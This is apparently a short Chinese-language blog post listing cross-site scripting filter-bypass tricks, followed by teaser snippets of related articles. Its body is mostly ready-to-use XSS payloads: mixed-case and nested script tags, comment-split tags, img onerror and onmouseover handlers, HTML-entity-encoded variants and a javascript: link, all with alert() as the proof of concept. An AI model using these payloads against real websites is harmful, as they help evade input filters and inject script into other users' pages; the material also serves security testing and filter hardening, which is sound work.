XSS 绕过方法

作者: blank_white | 来源:发表于2020-06-21 15:40 被阅读0次

XSS 绕过方法
xss绕过
XSS 绕过
XSS
XSS绕过WAF
XSS绕过姿势
xss编码绕过
XSS攻击（Cross Site Scripting）
绕过XSS-Filter
1、XSS简介及绕过方法介绍

1、大小写混用

<ScRiPt>alert("xss")</ScriPT>

2、拼凑
后台可能对一些字符过滤了一次，但是过滤后的其余字符又重新拼凑

<scri<script>pt>alert("xss")</sc</script>ript>

过滤之后：<script>alert("xss")</script>

3、注释干扰

<scri<!--ganrao-->pt>alter('xss')</sc<!--ganrao-->ript>

4、使用img标签

在装载图像的过程中如果发生了错误，就会触发onerror事件
<img src=x onerror='alert("xss")'/>

鼠标指针移动到图片后执行Javascript代码
<img src=x onmouseover='alert("xss")'/>

5、编码

<img src=x onerror='alert("xss")'/>

把特殊符号 HTML 编码
<img src=x onerror='alert(&quot;xss&quot;)' />

也可以连同字母字符全部编码
<img src=x onerror='&#97;&#108;&#101;  …… &#41;'/>

6、在 <a> 标签中使用JavaScript协议

<a href="javascript:alert('xss')">请点我</a>

XSS 绕过方法
1、大小写混用 2、拼凑后台可能对一些字符过滤了一次，但是过滤后的其余字符又重新拼凑 3、注释干扰 4、使用img...
xss绕过
当常见标签被过滤时，可以尝试以下几种，亲测有效更多参考www.freebuf.com/articles/web/...
XSS 绕过
javascript 1、JavaScript代码可以直接嵌在网页的任何地方，不过通常我们都把JavaScript...
XSS
xss.haozi.me 也不记得是从哪里知道了这个用于做xss的简单网站。整体上各种绕过方法还是值得去总结一下...
XSS绕过WAF
http://www.freebuf.com/articles/web/54686.html
XSS绕过姿势
0x01 简单介绍一个文件上传点是执行XSS应用程序的绝佳机会。很多网站都有用户权限上传个人资料图片的上传点，你...
xss编码绕过
对于xss等有关的html，url，unicode编码做的一个小总结。 - 奶奶奶奶奶糖 - 博客园
XSS攻击（Cross Site Scripting）
参考资料：[1]. 浅谈XSS攻击的那些事（附常用绕过姿势）[2]. XSS(偷你的Cookies) 什么是XSS...
绕过XSS-Filter
绕过XSS-Filter （1）利用<>标记 XSS-Filter通常过滤转义“<>”“ ”等字符（2）利用HT...
1、XSS简介及绕过方法介绍
一、概念： xss跨站脚本：一种经常出现在WEB应用程序中的计算机安全漏洞，是由于WEB应用程序对用户的输入过...